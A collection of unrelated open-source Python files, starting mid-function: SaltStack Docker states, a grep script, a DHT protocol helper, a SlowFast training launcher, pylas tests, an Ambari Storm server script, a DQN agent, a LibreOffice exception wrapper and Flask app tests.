hostname=None, user=None, detach=True, stdin_open=False, tty=False, mem_limit=None, ports=None, environment=None, dns=None, volumes=None, volumes_from=None, cpu_shares=None, cpuset=None, *args, **kwargs): ''' Ensure that a container with the given name exists; if not, build a new container from the specified image. (`docker run`) name Name for the container image Image from which to build this container tag tag of the image (defaults to 'latest') environment Environment variables for the container, either - a mapping of key, values - a list of mappings of key, values ports List of ports definitions, either: - a port to map - a mapping of mapping portInHost : PortInContainer volumes List of volumes (see notes for the running function) For other parameters, see absolutely first the salt.modules.dockerio execution module and the `docker-py python bindings for docker documentation <https://github.com/dotcloud/docker-py#api>`_ for `docker.create_container`. .. note:: This command does not verify that the named container is running the specified image. ''' ins_image = __salt__['docker.inspect_image'] ins_container = __salt__['docker.inspect_container'] create = __salt__['docker.create_container'] image_name = _get_image_name(image, tag) iinfos = ins_image(image_name) if not iinfos['status']: return _invalid(comment='Image "{0}" does not exist'.format(image_name)) cinfos = ins_container(name) already_exists = cinfos['status'] # if container exists but is not started, try to start it if already_exists: return _valid(comment='Container {0!r} already exists'.format(name)) dports, denvironment = {}, {} if __opts__['test']: comment = 'Container {0!r} will be created'.format(name) return _ret_status(name=name, comment=comment) if not ports: ports = [] if not volumes: volumes = [] if isinstance(environment, dict): for k in environment: denvironment[six.text_type(k)] = six.text_type(environment[k]) if isinstance(environment, list): for p in environment: if isinstance(p, dict): for k in p: denvironment[six.text_type(k)] = six.text_type(p[k]) for p in ports: if not isinstance(p, dict): dports[str(p)] = {} else: for k in p: dports[str(p)] = {} parsed_volumes = _parse_volumes(volumes) bindvolumes = parsed_volumes['bindvols'] contvolumes = parsed_volumes['contvols'] kw = dict( binds=bindvolumes, command=command, hostname=hostname, user=user, detach=detach, stdin_open=stdin_open, tty=tty, mem_limit=mem_limit, ports=dports, environment=denvironment, dns=dns, volumes=contvolumes, volumes_from=volumes_from, name=name, cpu_shares=cpu_shares, cpuset=cpuset) out = create(image_name, **kw) # if container has been created, even if not started, we mark # it as installed changes = 'Container created' try: cid = out['out']['info']['id'] except Exception as e: log.debug(str(e)) else: changes = 'Container {0} created'.format(cid) out['comment'] = changes ret = _ret_status(out, name, changes=changes) return ret def absent(name): ''' Ensure that the container is absent; if not, it will will be killed and destroyed. (`docker inspect`) name: Either the container name or id ''' ins_container = __salt__['docker.inspect_container'] cinfos = ins_container(name) changes = {} if cinfos['status']: cid = cinfos['id'] changes[cid] = {} is_running = __salt__['docker.is_running'](cid) if __opts__['test']: comment = 'Container {0!r} will be stopped and destroyed'.format(cid) return _ret_status(name=name, comment=comment) # Stop container gracefully, if running if is_running: changes[cid]['old'] = 'running' __salt__['docker.stop'](cid) is_running = __salt__['docker.is_running'](cid) if is_running: return _invalid(comment=("Container {0!r} could not be stopped" .format(cid))) else: __salt__['docker.remove_container'](cid) is_gone = __salt__['docker.exists'](cid) if is_gone: return _valid(comment=('Container {0!r}' ' was stopped and destroyed, '.format(cid)), changes={name: True}) else: return _valid(comment=('Container {0!r}' ' was stopped but could not be destroyed,'.format(cid)), changes={name: True}) else: __salt__['docker.remove_container'](cid) is_gone = __salt__['docker.exists'](cid) if is_gone: return _valid(comment=('Container {0!r}' 'is stopped and was destroyed, '.format(cid)), changes={name: True}) else: return _valid(comment=('Container {0!r}' ' is stopped but could not be destroyed,'.format(cid)), changes={name: True}) else: return _valid(comment="Container {0!r} not found".format(name)) def present(name, image=None, tag='latest', is_latest=False): ''' If a container with the given name is not present, this state will fail. Supports optionally checking for specific image/tag (`docker inspect`) name: container id image: image the container should be running (defaults to any) tag: tag of the image (defaults to 'latest') is_latest: also check if the container runs the latest version of the image ( latest defined as the latest pulled onto the local machine) ''' ins_container = __salt__['docker.inspect_container'] cinfos = ins_container(name) if 'id' in cinfos: cid = cinfos['id'] else: cid = name if not cinfos['status']: return _invalid(comment='Container {0} not found'.format(cid or name)) if cinfos['status'] and image is None: return _valid(comment='Container {0} exists'.format(cid)) image_name = _get_image_name(image, tag) if cinfos['status'] and cinfos['out']['Config']["Image"] == image_name and not is_latest: return _valid(comment='Container {0} exists and has image {1}'.format(cid, image_name)) ins_image = __salt__['docker.inspect_image'] iinfos = ins_image(image_name) if cinfos['status'] and cinfos['out']['Image'] == iinfos['out']['Id']: return _valid(comment='Container {0} exists and has latest version of image {1}'.format(cid, image_name)) return _invalid(comment='Container {0} found with wrong image'.format(cid or name)) def run(name, cid=None, hostname=None, onlyif=None, unless=None, docked_onlyif=None, docked_unless=None, *args, **kwargs): ''' Run a command in a specific container You can match by either name or hostname name command to run in the container cid Container id or name state_id state_id onlyif Only execute cmd if statement on the host returns 0 unless Do not execute cmd if statement on the host returns 0 docked_onlyif Only execute cmd if statement in the container returns 0 docked_unless Do not execute cmd if statement in the container returns 0 ''' if hostname: salt.utils.warn_until( 'Helium', 'The \'hostname\' argument has been deprecated.' ) retcode = __salt__['docker.retcode'] drun_all = __salt__['docker.run_all'] valid = functools.partial(_valid, name=name) if onlyif is not None: if not isinstance(onlyif, string_types): if not onlyif: return valid(comment='onlyif execution failed') elif isinstance(onlyif, string_types): if not __salt__['cmd.retcode'](onlyif) == 0: return valid(comment='onlyif execution failed') if unless is not None: if not isinstance(unless, string_types): if unless: return valid(comment='unless execution succeeded') elif isinstance(unless, string_types): if __salt__['cmd.retcode'](unless) == 0: return valid(comment='unless execution succeeded') if docked_onlyif is not None: if not isinstance(docked_onlyif, string_types): if not docked_onlyif: return valid(comment='docked_onlyif execution failed') elif isinstance(docked_onlyif, string_types): if not retcode(cid, docked_onlyif): return valid(comment='docked_onlyif execution failed') if docked_unless is not None: if not isinstance(docked_unless, string_types): if docked_unless: return valid(comment='docked_unless execution succeeded') elif isinstance(docked_unless, string_types): if retcode(cid, docked_unless): return valid(comment='docked_unless execution succeeded') if __opts__['test']: comment = 'Command {0!r} will be executed on container {1}'.format(name, cid) return _ret_status(name=name, comment=comment) result = drun_all(cid, name) if result['status']: return valid(comment=result['comment']) else: return _invalid(comment=result['comment'], name=name) def script(*args, **kw): ''' Placeholder function for a cmd.script alike. .. note:: Not yet implemented. Its implementation might be very similar from :mod:`salt.states.dockerio.run` ''' raise NotImplementedError def running(name, image, tag='latest', container=None, command=None, hostname=None, user=None, detach=True, stdin_open=False, tty=False, mem_limit=None, ports=None, environment=None, dns=None, volumes=None, volumes_from=None, start=True, cap_add=None, cap_drop=None, privileged=None, lxc_conf=None, network_mode=None, check_is_running=True, publish_all_ports=False, links=None, restart_policy=None, cpu_shares=None, cpuset=None, kill_signal=None, *args, **kwargs): ''' Ensure that a container is running. If the container does not exist, it will be created from the specified image. (`docker run`) name / container Name for the container image Image from which to build this container tag tag of the image (defaults to 'latest') environment Environment variables for the container, either - a mapping of key, values - a list of mappings of key, values ports List of ports definitions, either: - a port to map - a mapping of mapping portInHost : PortInContainer .. code-block:: yaml - ports: - "5000/tcp": HostIp: "" HostPort: "5000" publish_all_ports Publish all ports from the port list (default is false, only meaningful if port does not contain portinhost:portincontainer mapping) volumes List of volumes to mount or create in the container (like ``-v`` of ``docker run`` command), mapping host directory to container directory. To specify a volume in the container in terse list format: .. code-block:: yaml - volumes: - "/var/log/service" # container-only volume - "/srv/timezone:/etc/timezone" # bound volume - "/usr/local/etc/passwd:/etc/passwd:ro" # read-only bound volume You can also use the short dictionary form (note that the notion of source:target from docker is preserved): .. code-block:: yaml - volumes: - /var/log/service: /var/log/service # mandatory read-write implied Or, alternatively, to specify read-only mounting, use the extended form: .. code-block:: yaml - volumes: - /home/user1: bind: /mnt/vol2 ro: True - /var/www: bind: /mnt/vol1 ro: False Or (for backwards compatibility) another dict style: .. code-block:: yaml - volumes: /home/user1: bind: /mnt/vol2 ro: True /var/www: bind: /mnt/vol1 ro: False volumes_from List of containers to share volumes with dns List of DNS servers. .. code-block:: yaml - dns: - 127.0.0.1 network_mode - 'bridge': creates a new network stack for the container on the docker bridge - 'none': no networking for this container - 'container:[name|id]': reuses another container network stack) - 'host': use the host network stack inside the container .. code-block:: yaml - network_mode: host restart_policy Restart policy to apply when a container exits (no, on-failure[:max-retry], always) .. code-block:: yaml - restart_policy: MaximumRetryCount: 5 Name: on-failure cap_add List of capabilities to add in a container. cap_drop List of capabilities to drop in a container. check_is_running Enable checking if a container should run or not. Useful for data-only containers that must be linked to another one. e.g. nginx <- static-files cpu_shares CPU shares (relative weight) .. code-block:: yaml - cpu_shares: 2 cpuset CPUs in which to allow execution ('0-3' or '0,1') .. code-block:: yaml - cpuset: '0-3' kill_signal If defined, its value will be sent as a kill signal to the running container. i.e. It will use client.kill(signal=kill_signal) instead of client.restart(), when the state is triggered by a watcher requisite. possible use case: Soft reload of nginx .. code-block:: yaml nginx: docker.running: - image: some-fictional-registry.com/nginx - tag: latest - kill_signal: SIGHUP - watch: - file: /etc/nginx/nginx.conf This state will ask nginx to reload (instead of restart) each time the /etc/nginx/nginx.conf is modified. .. versionadded:: 2015.8.0 For other parameters, see salt.modules.dockerio execution module and the docker-py python bindings for docker documentation <https://github.com/dotcloud/docker-py#api>`_ for `docker.create_container`. .. note:: This command does not verify that the named container is running the specified image. ''' if container is None: container = name ins_image = __salt__['docker.inspect_image'] ins_container = __salt__['docker.inspect_container'] create = __salt__['docker.create_container'] image_name = _get_image_name(image, tag) iinfos = ins_image(image_name) image_exists = iinfos['status'] if not image_exists: return _invalid(comment='image "{0}" does not exists'.format(image_name)) cinfos = ins_container(name) already_exists = cinfos['status'] already_exists_with_same_image = ( # if container is known by name, already_exists # and the container is based on expected image, and cinfos['out']['Image'] == iinfos['out']['Id'] # then assume it already exists. ) is_running = __salt__['docker.is_running'](container) # if container exists but is not started, try to start it if already_exists_with_same_image and (is_running or not start): return _valid(comment='container {0!r} already exists'.format(name)) if not already_exists_with_same_image and already_exists: # Outdated container: It means it runs against an old image. # We're gonna have to stop and remove the old container, to let # the name available for the new one. if __opts__['test']: comment = 'Will replace outdated container {0!r}'.format(name) return _ret_status(name=name, comment=comment) if is_running: stop_status = __salt__['docker.stop'](name) if not stop_status['status']: return _invalid(comment='Failed to stop outdated container {0!r}'.format(name)) remove_status = __salt__['docker.remove_container'](name) if not remove_status['status']: return _invalid(comment='Failed to remove outdated container {0!r}'.format(name)) already_exists = False # now it's clear, the name is available for the new container if __opts__['test']: comment = 'Will create container {0!r}'.format(name) return _ret_status(name=name, comment=comment) # parse input data exposeports, bindports, contvolumes, bindvolumes, denvironment, changes = [], {}, [], {}, {}, [] if not ports: ports = {} if not volumes: volumes = {} if not volumes_from: volumes_from = [] if isinstance(environment, dict): for key in environment: denvironment[six.text_type(key)] = six.text_type(environment[key]) if isinstance(environment, list): for var in environment: if isinstance(var, dict): for key in var: denvironment[six.text_type(key)] = six.text_type(var[key]) if isinstance(volumes, dict): bindvolumes = volumes if isinstance(volumes, list): for vol in volumes: if isinstance(vol, dict): # get source as the dict key source = list(vol.keys())[0] # then find target if isinstance(vol[source], dict): target = vol[source]['bind'] read_only = vol[source].get('ro', False) else: target = str(vol[source]) read_only = False bindvolumes[source] = {'bind': target, 'ro': read_only } else: # assume just an own volumes contvolumes.append(str(vol)) if isinstance(ports, dict): bindports = ports # in dict form all ports bind, so no need for exposeports if isinstance(ports, list): for port in ports: if isinstance(port, dict): container_port = list(port.keys())[0] # find target if isinstance(port[container_port], dict): host_port = port[container_port]['HostPort'] host_ip = port[container_port].get('HostIp', '0.0.0.0') else: host_port = str(port[container_port]) host_ip = '0.0.0.0' bindports[container_port] = { 'HostPort': host_port, 'HostIp': host_ip } else: # assume just a port to expose exposeports.append(str(port)) parsed_volumes = _parse_volumes(volumes) bindvolumes = parsed_volumes['bindvols'] contvolumes = parsed_volumes['contvols'] if not already_exists: kwargs = dict(command=command, hostname=hostname, user=user, detach=detach, stdin_open=stdin_open, tty=tty, mem_limit=mem_limit, ports=exposeports, environment=denvironment, dns=dns, binds=bindvolumes, volumes=contvolumes, name=name, cpu_shares=cpu_shares, cpuset=cpuset) out = create(image_name, **kwargs) # if container has been created, even if not started, we mark # it as installed try: cid = out['out']['info']['id'] log.debug(str(cid)) except Exception as e: changes.append('Container created') log.debug(str(e)) else: changes.append('Container {0} created'.format(cid)) if start: started = __salt__['docker.start'](name, binds=bindvolumes, port_bindings=bindports, lxc_conf=lxc_conf, publish_all_ports=publish_all_ports, links=links, privileged=privileged, dns=dns, volumes_from=volumes_from, network_mode=network_mode, restart_policy=restart_policy, cap_add=cap_add, cap_drop=cap_drop) if check_is_running: is_running = __salt__['docker.is_running'](name) log.debug("Docker-io running:" + str(started)) log.debug("Docker-io running:" + str(is_running)) if is_running: changes.append('Container {0!r} started.\n'.format(name)) else: return _invalid(comment=('Container {0!r} cannot be started\n{1!s}' .format(name, started['out'],))) else: changes.append('Container {0!r} started.\n'.format(name)) return _valid(comment='\n'.join(changes), changes={name: True})
py
7dfa064d34a5d21bc201ac2f265e81bffc81b71d
#!/usr/bin/env python __author__ = "bt3" import sys def grep_word_from_files(): ''' using iterator enumerate to create a grep command ''' word = sys.argv[1] for filename in sys.argv[2:]: with open(filename) as file: for lino, line in enumerate(file, start=1): if word in line: print("{0}:{1}:{2:.40}".format(filename, lino, line.rstrip())) if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: grep_word_from_files.py word infile1 [infile2...]") sys.exit() else: grep_word_from_files()
py
7dfa09a2622fd8cef0e6c902a11e115364038d86
import socket import struct from TorrentPython.Bencode import * class DHTProtocol(object): COMPACT_NODE_INFO_LENGTH = 26 # byte @staticmethod def get_ping(client_id: bytes): return Bencode.encode( {b't': b'aa', b'y': b'q', b'q': b'ping', b'a': {b'id': client_id}}) @staticmethod def get_peers(client_id: bytes, info_hash: bytes): if len(info_hash) is not 20: return None return Bencode.encode( {b't': b'aa', b'y': b'q', b'q': b'get_peers', b'a': {b'id': client_id, b'info_hash': info_hash}}) @staticmethod def is_response(response: dict): return b'r' in response @staticmethod def parse_peers(response: dict): peers = [] nodes = {} if not DHTProtocol.is_response(response): return peers, nodes source = response.get(b'r').get(b'values') if source: for sample in source: peers.append((socket.inet_ntoa(sample[:4]), struct.unpack('!H', sample[4:4 + 2])[0])) source = response.get(b'r').get(b'nodes') if source: for idx in range(0, len(source), DHTProtocol.COMPACT_NODE_INFO_LENGTH): sample = source[idx:idx + DHTProtocol.COMPACT_NODE_INFO_LENGTH] nodes[sample[:20]] = (socket.inet_ntoa(sample[20:20 + 4]), struct.unpack('!H', sample[24:24 + 2])[0]) return peers, nodes
py
7dfa0a3d4ac94c7f4f0d832003d071aeb1bb865f
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. """Wrapper to train and test a video classification model.""" import argparse import sys import torch import slowfast.utils.checkpoint as cu import slowfast.utils.multiprocessing as mpu from slowfast.config.defaults import get_cfg from test_net import test from train_net import train def parse_args(): """ Parse the following arguments for the video training and testing pipeline. Args: shard_id (int): shard id for the current machine. Starts from 0 to num_shards - 1. If single machine is used, then set shard id to 0. num_shards (int): number of shards using by the job. init_method (str): initialization method to launch the job with multiple devices. Options includes TCP or shared file-system for initialization. details can be find in https://pytorch.org/docs/stable/distributed.html#tcp-initialization cfg (str): path to the config file. opts (argument): provide addtional options from the command line, it overwrites the config loaded from file. """ parser = argparse.ArgumentParser( description="Provide SlowFast video training and testing pipeline." ) parser.add_argument( "--shard_id", help="The shard id of current node, Starts from 0 to num_shards - 1", default=0, type=int, ) parser.add_argument( "--num_shards", help="Number of shards using by the job", default=1, type=int, ) parser.add_argument( "--init_method", help="Initialization method, includes TCP or shared file-system", default="tcp://localhost:9999", type=str, ) # 'configs/VidOR/I3D_8x8_R50.yaml' # 'configs/VidOR/SLOWFAST_8x8_R50.yaml' parser.add_argument( "--cfg", dest="cfg_file", help="Path to the config file", default='configs/VidOR/SLOWFAST_8x8_R50.yaml', type=str, ) parser.add_argument( "opts", help="See slowfast/config/defaults.py for all options", default=None, nargs=argparse.REMAINDER, ) if len(sys.argv) == 1: parser.print_help() return parser.parse_args() def load_config(args): """ Given the arguemnts, load and initialize the configs. Args: args (argument): arguments includes `shard_id`, `num_shards`, `init_method`, `cfg_file`, and `opts`. """ # Setup cfg. cfg = get_cfg() # Load config from cfg. if args.cfg_file is not None: cfg.merge_from_file(args.cfg_file) # Load config from command line, overwrite config from opts. if args.opts is not None: cfg.merge_from_list(args.opts) # Inherit parameters from args. if hasattr(args, "num_shards") and hasattr(args, "shard_id"): cfg.NUM_SHARDS = args.num_shards cfg.SHARD_ID = args.shard_id if hasattr(args, "rng_seed"): cfg.RNG_SEED = args.rng_seed if hasattr(args, "output_dir"): cfg.OUTPUT_DIR = args.output_dir # Create the checkpoint dir. cu.make_checkpoint_dir(cfg.OUTPUT_DIR) return cfg def main(): """ Main function to spawn the train and test process. """ args = parse_args() cfg = load_config(args) # Perform training. if cfg.TRAIN.ENABLE: if cfg.NUM_GPUS > 1: torch.multiprocessing.spawn( mpu.run, nprocs=cfg.NUM_GPUS, args=( cfg.NUM_GPUS, train, args.init_method, cfg.SHARD_ID, cfg.NUM_SHARDS, cfg.DIST_BACKEND, cfg, ), daemon=False, ) else: train(cfg=cfg) # Perform multi-clip testing. if cfg.TEST.ENABLE: if cfg.NUM_GPUS > 1: torch.multiprocessing.spawn( mpu.run, nprocs=cfg.NUM_GPUS, args=( cfg.NUM_GPUS, test, args.init_method, cfg.SHARD_ID, cfg.NUM_SHARDS, cfg.DIST_BACKEND, cfg, ), daemon=False, ) else: test(cfg=cfg) if __name__ == "__main__": torch.multiprocessing.set_start_method("forkserver") main()
py
7dfa0a7a0265e9df951d9eb4b42fa0225344423e
import io import numpy as np import pytest import pylas from pylas import PointFormat from pylastests.test_common import write_then_read_again, simple_las, test1_4_las @pytest.fixture() def file1_4(): return pylas.read(test1_4_las) @pytest.fixture() def file(): return pylas.read(simple_las) def test_xyz(): las = pylas.create() shape = (150,) las.X = np.zeros(shape, dtype=np.int32) las.Y = np.ones(shape, dtype=np.int32) las.Z = np.zeros(shape, dtype=np.int32) las.Z[:] = -152 las = write_then_read_again(las) assert np.alltrue(las.X == 0) assert np.alltrue(las.Y == 1) assert np.alltrue(las.Z == -152) def test_wrong_version(): for i in range(6, 8): with pytest.raises(pylas.errors.PylasError): _ = pylas.create(point_format=i, file_version="1.2") def test_good_version_is_used(): for i in range(6, 8): las = pylas.create(point_format=i) assert las.header.version.major == 1 assert las.header.version.minor == 4 def test_create_fmt_0(): new = pylas.create(point_format=0) with pytest.raises(ValueError): new.red = np.zeros(len(new.points), np.uint16) with pytest.raises(ValueError): new.red = np.zeros(len(new.points), np.uint16) with pytest.raises(ValueError): new.red = np.zeros(len(new.points), np.uint16) with pytest.raises(ValueError): new.gps_time = np.zeros(len(new.points), np.float64) def test_create_fmt_1(): new = pylas.create(point_format=1) with pytest.raises(ValueError): new.red = np.zeros(len(new.points), np.uint16) with pytest.raises(ValueError): new.red = np.zeros(len(new.points), np.uint16) with pytest.raises(ValueError): new.red = np.zeros(len(new.points), np.uint16) gps_time = np.random.uniform(0, 25641, len(new.points)) new.gps_time = gps_time assert np.allclose(new.gps_time, gps_time) new = write_then_read_again(new) assert np.allclose(new.gps_time, gps_time) def test_create_fmt_2(file): new = pylas.create(point_format=2) with pytest.raises(ValueError): new.gps_time = file.gps_time new.red = file.red new.green = file.green new.blue = file.blue assert np.allclose(new.red, file.red) assert np.allclose(new.green, file.green) assert np.allclose(new.blue, file.blue) new = write_then_read_again(new) assert np.allclose(new.red, file.red) assert np.allclose(new.green, file.green) assert np.allclose(new.blue, file.blue) def test_create_fmt_3(file): new = pylas.create(point_format=3) new.red = file.red new.green = file.green new.blue = file.blue new.gps_time = file.gps_time assert np.allclose(new.red, file.red) assert np.allclose(new.green, file.green) assert np.allclose(new.blue, file.blue) assert np.allclose(new.gps_time, file.gps_time) new = write_then_read_again(new) assert np.allclose(new.red, file.red) assert np.allclose(new.green, file.green) assert np.allclose(new.blue, file.blue) assert np.allclose(new.gps_time, file.gps_time) def test_create_fmt_6(file1_4): new = pylas.create(point_format=6) assert str(new.header.version) == "1.4" dim_names_fmt_6 = PointFormat(6).dtype().names for dim_name in dim_names_fmt_6: new[dim_name] = file1_4[dim_name] for dim_name in dim_names_fmt_6: assert np.allclose(new[dim_name], file1_4[dim_name]), "{} not equal".format( dim_name ) new = write_then_read_again(new) for dim_name in dim_names_fmt_6: assert np.allclose(new[dim_name], file1_4[dim_name]), "{} not equal".format( dim_name ) @pytest.mark.parametrize("laz_backend", (None,) + pylas.LazBackend.detect_available()) def test_writing_empty_file(laz_backend): las = pylas.create() with io.BytesIO() as out: if laz_backend is None: las.write(out) else: las.write(out, laz_backend=laz_backend)
py
7dfa0b90ce1f6624823373f93d9226e0de139073
#!/usr/bin/env python """ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import sys from resource_management.libraries.functions import check_process_status from resource_management.libraries.script import Script from resource_management.libraries.functions import conf_select from resource_management.libraries.functions import hdp_select from resource_management.libraries.functions import format from resource_management.core.resources.system import Execute from resource_management.libraries.functions.version import compare_versions, format_hdp_stack_version from storm import storm from service import service from service_check import ServiceCheck from resource_management.libraries.functions.security_commons import build_expectations, \ cached_kinit_executor, get_params_from_filesystem, validate_security_config_properties, \ FILE_TYPE_JAAS_CONF class DrpcServer(Script): def get_stack_to_component(self): return {"HDP": "storm-client"} def install(self, env): self.install_packages(env) self.configure(env) def configure(self, env): import params env.set_params(params) storm() def pre_upgrade_restart(self, env, upgrade_type=None): import params env.set_params(params) if params.version and compare_versions(format_hdp_stack_version(params.version), '2.2.0.0') >= 0: conf_select.select(params.stack_name, "storm", params.version) hdp_select.select("storm-client", params.version) def start(self, env, upgrade_type=None): import params env.set_params(params) self.configure(env) service("drpc", action="start") def stop(self, env, upgrade_type=None): import params env.set_params(params) service("drpc", action="stop") def status(self, env): import status_params env.set_params(status_params) check_process_status(status_params.pid_drpc) def security_status(self, env): import status_params env.set_params(status_params) if status_params.security_enabled: # Expect the following files to be available in status_params.config_dir: # storm_jaas.conf try: props_value_check = None props_empty_check = ['StormServer/keyTab', 'StormServer/principal'] props_read_check = ['StormServer/keyTab'] storm_env_expectations = build_expectations('storm_jaas', props_value_check, props_empty_check, props_read_check) storm_expectations = {} storm_expectations.update(storm_env_expectations) security_params = get_params_from_filesystem(status_params.conf_dir, {'storm_jaas.conf': FILE_TYPE_JAAS_CONF}) result_issues = validate_security_config_properties(security_params, storm_expectations) if not result_issues: # If all validations passed successfully # Double check the dict before calling execute if ( 'storm_jaas' not in security_params or 'StormServer' not in security_params['storm_jaas'] or 'keyTab' not in security_params['storm_jaas']['StormServer'] or 'principal' not in security_params['storm_jaas']['StormServer']): self.put_structured_out({"securityState": "ERROR"}) self.put_structured_out({"securityIssuesFound": "Keytab file or principal are not set property."}) return cached_kinit_executor(status_params.kinit_path_local, status_params.storm_user, security_params['storm_jaas']['StormServer']['keyTab'], security_params['storm_jaas']['StormServer']['principal'], status_params.hostname, status_params.tmp_dir) self.put_structured_out({"securityState": "SECURED_KERBEROS"}) else: issues = [] for cf in result_issues: issues.append("Configuration file %s did not pass the validation. Reason: %s" % (cf, result_issues[cf])) self.put_structured_out({"securityIssuesFound": ". ".join(issues)}) self.put_structured_out({"securityState": "UNSECURED"}) except Exception as e: self.put_structured_out({"securityState": "ERROR"}) self.put_structured_out({"securityStateErrorInfo": str(e)}) else: self.put_structured_out({"securityState": "UNSECURED"}) if __name__ == "__main__": DrpcServer().execute()
py
7dfa0de2286a470de79d0ee3a24fdcc6cbd7d1d4
####################################################################### # Copyright (C) 2017 Shangtong Zhang([email protected]) # # Permission given to modify the code as long as you keep this # # declaration at the top # ####################################################################### from network import * from component import * from utils import * import numpy as np import time import os import pickle import torch # This HRA DQN with removing irrelevant features class MSDQNAgent: def __init__(self, config): self.config = config self.learning_network = config.network_fn(config.optimizer_fn) self.target_network = config.network_fn(config.optimizer_fn) self.target_network.load_state_dict(self.learning_network.state_dict()) self.task = config.task_fn() self.replay = config.replay_fn() self.policy = config.policy_fn() self.total_steps = 0 def episode(self, deterministic=False): episode_start_time = time.time() state = self.task.reset() total_reward = 0.0 steps = 0 while True: value = self.learning_network.predict(np.stack([state]), True) value = value.cpu().data.numpy().flatten() if deterministic: action = np.argmax(value) elif self.total_steps < self.config.exploration_steps: action = np.random.randint(0, len(value)) else: action = self.policy.sample(value) next_state, reward, done, info = self.task.step(action) done = (done or (self.config.max_episode_length and steps > self.config.max_episode_length)) if not deterministic: self.replay.feed([state, action, reward, next_state, int(done)]) self.total_steps += 1 total_reward += np.sum(reward * self.config.reward_weight) steps += 1 state = next_state if done: break if not deterministic and self.total_steps > self.config.exploration_steps: experiences = self.replay.sample() states, actions, rewards, next_states, terminals = experiences if self.config.hybrid_reward: q_next = self.target_network.predict(next_states, False) target = [] for q_next_ in q_next: if self.config.target_type == self.config.q_target: target.append(q_next_.detach().max(1)[0]) elif self.config.target_type == self.config.expected_sarsa_target: target.append(q_next_.detach().mean(1)) target = torch.cat(target, dim=1).detach() terminals = self.learning_network.to_torch_variable(terminals).unsqueeze(1) rewards = self.learning_network.to_torch_variable(rewards) target = self.config.discount * target * (1 - terminals.expand_as(target)) target.add_(rewards) q = self.learning_network.predict(states, False) q_action = [] actions = self.learning_network.to_torch_variable(actions, 'int64').unsqueeze(1) for q_ in q: q_action.append(q_.gather(1, actions)) q_action = torch.cat(q_action, dim=1) loss = self.learning_network.criterion(q_action, target) else: q_next = self.target_network.predict(next_states, True).detach() if self.config.double_q: _, best_actions = self.learning_network.predict(next_states).detach().max(1) q_next = q_next.gather(1, best_actions) else: q_next, _ = q_next.max(1) terminals = self.learning_network.to_torch_variable(terminals).unsqueeze(1) rewards = np.sum(rewards * self.config.reward_weight, axis=1) rewards = self.learning_network.to_torch_variable(rewards).unsqueeze(1) q_next = self.config.discount * q_next * (1 - terminals) q_next.add_(rewards) actions = self.learning_network.to_torch_variable(actions, 'int64').unsqueeze(1) q = self.learning_network.predict(states, True) q = q.gather(1, actions) loss = self.learning_network.criterion(q, q_next) self.learning_network.zero_grad() loss.backward() self.learning_network.optimizer.step() if not deterministic and self.total_steps % self.config.target_network_update_freq == 0: self.target_network.load_state_dict(self.learning_network.state_dict()) if not deterministic and self.total_steps > self.config.exploration_steps: self.policy.update_epsilon() episode_time = time.time() - episode_start_time self.config.logger.debug('episode steps %d, episode time %f, time per step %f' % (steps, episode_time, episode_time / float(steps))) return total_reward, steps
py
7dfa0e0584de804f46d0c014eae698b615ac3dfd
# coding: utf-8 # # Copyright 2022 :Barry-Thomas-Paul: Moss # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http: // www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Exception Class # this is a auto generated file generated by Cheetah # Namespace: com.sun.star.document # Libre Office Version: 7.3 from typing import TYPE_CHECKING from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT: import uno def _get_class(): orig_init = None ordered_keys = ('Message', 'Context') def init(self, *args, **kwargs): if len(kwargs) == 0 and len(args) == 1 and getattr(args[0], "__class__", None) == self.__class__: orig_init(self, args[0]) return kargs = kwargs.copy() for i, arg in enumerate(args): kargs[ordered_keys[i]] = arg orig_init(self, **kargs) type_name = 'com.sun.star.document.EmptyUndoStackException' ex = uno.getClass(type_name) ex.__ooo_ns__ = 'com.sun.star.document' ex.__ooo_full_ns__= type_name ex.__ooo_type_name__ = 'exception' orig_init = ex.__init__ ex.__init__ = init return ex EmptyUndoStackException = _get_class() else: from ...lo.document.empty_undo_stack_exception import EmptyUndoStackException as EmptyUndoStackException __all__ = ['EmptyUndoStackException']
py
7dfa0ef4b7969aa144bf8eb4af94eae66c82a60d
import os import flaskr import unittest import tempfile class FlaskrTestCase(unittest.TestCase): def setUp(self): self.db_fd, flaskr.app.config['DATABASE'] = tempfile.mkstemp() flaskr.app.config['TESTING'] = True self.app = flaskr.app.test_client() flaskr.init_db() def tearDown(self): os.close(self.db_fd) os.unlink(flaskr.app.config['DATABASE']) def test_empty_db(self): rv = self.app.get('/') assert b'No entries here so far' in rv.data def login(self, username, password): return self.app.post('/login', data=dict( username=username, password=password ), follow_redirects=True) def logout(self): return self.app.get('/logout', follow_redirects=True) def test_login_logout(self): rv = self.login('admin', 'default') assert b'You were logged in' in rv.data rv = self.logout() assert b'You were logged out' in rv.data rv = self.login('adminx', 'default') assert b'Invalid username' in rv.data rv = self.login('admin', 'defaultx') assert b'Invalid password' in rv.data def test_messages(self): self.login('admin', 'default') rv = self.app.post('/add', data=dict( title='<Hello>', text='<strong>HTML</strong> allowed here' ), follow_redirects=True) assert b'No entries here so far' not in rv.data assert b'&lt;Hello&gt;' in rv.data assert b'<strong>HTML</strong> allowed here' in rv.data if __name__ == '__main__': unittest.main()
py
7dfa0efa264da9ffeea368bebbf9e2e126bd9c0f
